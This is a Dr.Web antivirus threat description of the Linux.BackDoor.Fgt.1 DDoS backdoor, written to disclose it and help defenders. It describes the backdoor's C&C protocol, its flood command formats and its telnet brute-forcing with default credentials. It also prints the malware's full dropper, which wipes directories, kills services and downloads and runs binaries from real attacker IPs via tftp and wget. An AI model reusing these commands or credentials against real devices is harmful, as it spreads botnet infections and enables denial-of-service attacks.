Defend what you create

Other Resources

Close

Library
My library

+ Add to library

Contact us
24/7 Tech support Rules regarding submitting

Send a message

Your tickets

Profile

Linux.BackDoor.Fgt.1

Added to Dr.Web virus database:2014-11-17
Virus description was added:2015-05-12

A Trojan targeting Linux devices. There are numerous versions of Linux.BackDoor.Fgt.1 for different Linux distributions, including distributions for MIPS and SPARC architectures. The malicious program is designed to carry out DDoS attacks.

During initialization on the infected device, Linux.BackDoor.Fgt.1 gets the current time value and the ID of its own running process. Then the Trojan applies the XOR operation to the generated values and uses the result as a seed for the random number generator.

void __cdecl init_rand(DWORD seed)
{
  DWORD i; // [sp+Ch] [bp-4h]@1
  Q[0] = seed;
  Q[1] = seed - 0x61C88647;
  Q[2] = seed + 0x3C6EF372;
  for ( i = 3; i <= 4095; ++i )
  {
    Q[i] = Q[i - 2] ^ Q[i - 3] ^ i ^ 0x9E3779B9;
  }
}

By referring to one of Google services (8.8.8.8:53), the Trojan verifies if an Internet connection is established. If the connection is established, the malware calls the getsockname and ioctl functions with the parameter SIOCGIFHWADDR. As a result, the Trojan receives IP and MAC addresses of the infected device.

After initialization is completed, Linux.BackDoor.Fgt.1 attempts to establish a connection to the command and control server whose address is stored in the Trojan’s body in one of the following formats:

aaa.bbb.ccc.ddd

or

aaa.bbb.ccc.ddd:port

If the first format is used, the Trojan attempts to establish a connection to port 1776. Once the connection is established, Linux.BackDoor.Fgt.1 sends the following string to the command and control server:

"BUILD %s\nPING"

where %s is the key phrase which stands for the Trojan’s version, for example, NEW WORLD ORDER.

In reply, the server sends a 4,096-byte buffer removing spaces at the beginning and at the end of it. If the buffer contains the PING command, the Trojan replies with PONG and continues to operate on the infected device. If Linux.BackDoor.Fgt.1 receives the DUP command, the malware terminates its work.

The buffer looks as follows:

!string cmd arg_list\0

where “string” and “cmd” stand for ASCII strings, separated by a space; arg_list stands for an array of ASCII strings, separated either by spaces or by the '\n' value.

The Trojan modifies the data in the “cmd” string into uppercase letters and then compares it to the data in the SH string. If the strings match, arg_list indicates a list of commands to be executed using “sh -c”, and the command output will be sent to the command and control server.

Otherwise, arg_list is split into substrings (every space character and every string break character are replaced with \0) and the command buffer is generated as follows:

char * pCmdBuffer[] = { cmd, arg0, arg1, ... };

where “cmd” stands for the string containing a command, strings arg0, arg1,... stand for command arguments.

Linux.BackDoor.Fgt.1 can execute the following commands:

CommandDescriptionReplyCommand format
PINGTest the connectionPONG
GETLOCALIPGet the infected device’s IP“My IP: %s”, where %s is replaced with textual representation of the infected device’s IP.
SCANNERScanner’s status changeIf the incoming command does not contain additional parameters, the reply will look as follows: SCANNER ON | OFF.
Otherwise, if the command contains the additional parameter OFF, the reply will not be sent.
Otherwise, if the command contains the additional parameter ON, refer to the SCANNER section (below).
DNSDNS Amplification "DNS <target> <port (0 for random)> <time> <some data> <domain for resolving> <num of packets> "
UDPUDP Flood "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> (packet size, usually 0) (time poll interval, default 10)"
TCPSYN Flood "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)"
JUNKGenerate random traffic "JUNK <ip> <port> <time>"
HOLDGenerate random traffic "HOLD <ip> <port> <time>"
RANDOMUDP Flood "RANDOM <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> (packet size, usually 0) (time poll interval, default 10)"
KILLATKTerminate a DDoS attack
LOLNOGTFOTerminate backdoor’s working processes

During one cycle, the Trojan can scan 256 IP addresses of remote devices. To generate a list of addresses, the Trojan uses the following algorithm:

The malware initializes the array containing 256 st_scan_data structures and sends the “Starting gayscan” string to the server.

#pragma pack(push, 1)
struct st_scan_data
{
  _DWORD socket;
  _DWORD RndPublicIp;
  _BYTE state;
  _BYTE disconnected;
  _BYTE UsernameIndex;
  _BYTE PasswordsIndex;
  _DWORD time;
  _WORD pos;
  _BYTE *buffer;
};
#pragma pack(pop)
  1. Linux.BackDoor.Fgt.1 generates a random public IP address (the following ranges are not allowed: 10.*.*.*, 127.*.*.*, 169.254.*.*, 100.64+,*.*, 172.16-.*.*, 192.0.2.*, 192.88.99.*, 192.168.*.*, 198.18.*.*, 198.19.*.*, 198.51.100.*, 203.0.113.*, 224+.*.*.*) and attempts to establish a connection. If the attempt fails, the Trojan sends the following report to the command and control server:
    "[%d:%d] socket couldn't init"
    "[%d:%d] socket dead, rip"
    where the first %d argument stands for the structure number, while the second %d argument stands for the IP address.
  2. Then the Trojan sets socket parameters. If the attempt fails, the malware sends the following report to the command and control server:
    "[%d:%d] couldn't select, rip"
    "[%d:%d] sockets are set up, commencing"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.
  3. Next, the malware reads the data from the remote host searching the following strings for the request to enter login/password:
    "user"
    "login"
    "pass"
    "dvrdvs"
    "name"
    If it succeeds, the Trojan sends the following message to the command and control server:
    "[%d:%d] login prompt found"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status;
    or
    "[%d:%d] timed out"
    if during a 10-second period the Trojan does not receive the necessary data from the remote host.
  4. The Trojan sends the following information to the command and control server:
    "[%d:%d] sending username %s [%s]"

    Following arguments: structure number, status, login, password.

    Login is selected from the following list:

    "root"
    "admin"

    Password is selected from the following list:

    "root"
    "admin"
    "12345"
    "" (empty string)
  5. Depending on the error received from the attacked host, the following messages can be sent to the command and control server:
    "[%d:%d] couldn't send newline"
    "[%d:%d] couldn't send username"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.
  6. In the received reply, Linux.BackDoor.Fgt.1 searches for the strings indicating request for the password. If one of the strings is found, the malware sends the following string to the command and control server:
    "[%d:%d] password prompt found"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.
  7. The Trojan sends the password to the host and the following message to the command and control server:
    "[%d:%d] sending password %s [%s]"
    Following arguments: structure number, status, login, password.

    If a failure occurs, sends one of the following messages to the command and control server:

    "[%d:%d] couldn't send newline"
    "[%d:%d] couldn't send password"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.
  8. The Trojan searches for the following strings in the reply it receives from the attacked host:
    "invalid"
    "incorrect"
    "fail"
    "again"
    "wrong"
    "accessdenied"
    "error"
    "bad"
    "success"
    "busybox"
    "shell"
    "dvrdvs"
    If a match is found, the malware checks the reply for the strings indicating a failed authentication attempt:
    "invalid"
    "incorrect"
    "fail"
    "again"
    "wrong"
    "accessdenied"
    "error"
    "bad"
    If one of them is found, the Trojan sends the following string to the command and control server:
    "[%d:%d] incorrect"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.
  9. Then the Trojan sends the following string to the command and control server:
    "[%d:%d] writing the gay echo -e"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.

    The malware sends the echo command to the attacked host.

    "echo -e '\\x67\\x61\\x79\\x66\\x67\\x74'\r\n"
    If a failure occurs, the Trojan sends the following string to the command and control server:
    "[%d:%d] error sending gayfgt confirmation"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.
  10. The Trojan verifies that the echo command was executed successfully by checking the host’s reply for the “gayfgt” string. Then it sends the following string to the command and control server:
    "[%d:%d] gayfgt found or timed out"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.

    Next, the malware sends the following string:

    "REPORT %s:%s:%s"
    with the following arguments: IP of the host (with specified login and password), login, and password.
  11. The following string is sent to the command and control server:
    "[%d:%d] shitting on your moms chest"
    where the first %d argument stands for the structure number and the second %d argument stands for the task execution status.

    The following command is sent to the attacked host:

    cd /tmp/;
    busybox tftp 217.71.50.13 -c get bin3;
    sh bin3.sh;
    busybox tftp -r bin2.sh -g 217.71.50.13; 
    sh bin2.sh;
    busybox wget http://192.3.205.154/bin.sh; 
    sh bin.sh; 
    echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\r\n
    The Trojan verifies that the command was executed successfully by checking the host’s reply for the “binfagt” string.

Then the steps from 1 to 11 are repeated for other 255 structures. Thus, during one scan, 256 random IP addresses are checked.

If the Trojan passes authentication on the attacked host, it sends a command to download a special script which, in turn, downloads an executable file of Linux.BackDoor.Fgt.1 and runs it.

#!/bin/sh
cd /tmp/
rm -f *
rm -rf /tmp/*
rm -rf /home/hik/* && cd /home/hik
rm -rf /var/run/*
sleep 5;
killall telnetx
killall mips
killall mipsel
killall arm
killall ppc
killall arm7
killall superh
killall i586
killall i686
killall sparc
killall .usb
sleep 5;
busybox wget http://192.3.205.154/mips;
cp /bin/busybox ./; cat mips > busybox; 
rm mips; cp busybox mips; 
rm busybox; ./mips && sleep 2
busybox wget http://192.3.205.154/mipsel; 
cp /bin/busybox ./; 
cat mipsel > busybox; rm mipsel; 
cp busybox mipsel; 
rm busybox; 
./mipsel && sleep 2
busybox wget http://192.3.205.154/arm; 
cp /bin/busybox ./; 
cat arm > busybox; rm arm; 
cp busybox arm; 
rm busybox; ./arm && sleep 3
#busybox wget http://192.3.205.154/arm7; 
#cp /bin/busybox ./; 
#cat arm7 > busybox; rm arm7; 
#cp busybox arm7; 
#rm busybox; 
#./arm7 && sleep 2
busybox wget http://192.3.205.154/ppc; 
cp /bin/busybox ./; 
cat ppc > busybox; rm ppc; 
cp busybox ppc; 
rm busybox; 
./ppc && sleep 3
busybox wget http://192.3.205.154/superh; 
cp /bin/busybox ./; 
cat superh > busybox; 
rm superh; 
cp busybox superh; 
rm busybox; 
./superh && sleep 2
busybox wget http://192.3.205.154/i586; 
cp /bin/busybox ./; 
cat i586 > busybox; 
rm i586; 
cp busybox i586; 
rm busybox; 
./i586 && 
sleep 2
busybox wget http://192.3.205.154/i686; 
cp /bin/busybox ./; 
cat i686 > busybox; rm i686; 
cp busybox i686; 
rm busybox; 
./i686 && 
sleep 2
busybox wget http://192.3.205.154/sparc; 
cp /bin/busybox ./; 
cat sparc > busybox; 
rm sparc; 
cp busybox sparc; 
rm busybox; 
./sparc && sleep 2
sleep 5;
rm -f *
sleep 5;
killall -9 sshd
killall -9 telnetd

It should be noted that there are numerous executable files of Linux.BackDoor.Fgt.1 stored on cybercriminals’ server. These files are compiled for different Linux versions and distributions, including distributions for MIPS and SPARC architectures. Thus, the Trojan can infect not only Linux servers and workstations connected to the Internet but also other devices, for example, routers.

News about this threat

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

The Russian developer of Dr.Web anti-viruses

Doctor Web has been developing anti-virus software since 1992

Dr.Web is trusted by users around the world in 200+ countries

The company has delivered an anti-virus as a service since 2007

24/7 tech support

© Doctor Web
2003 — 2018

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125040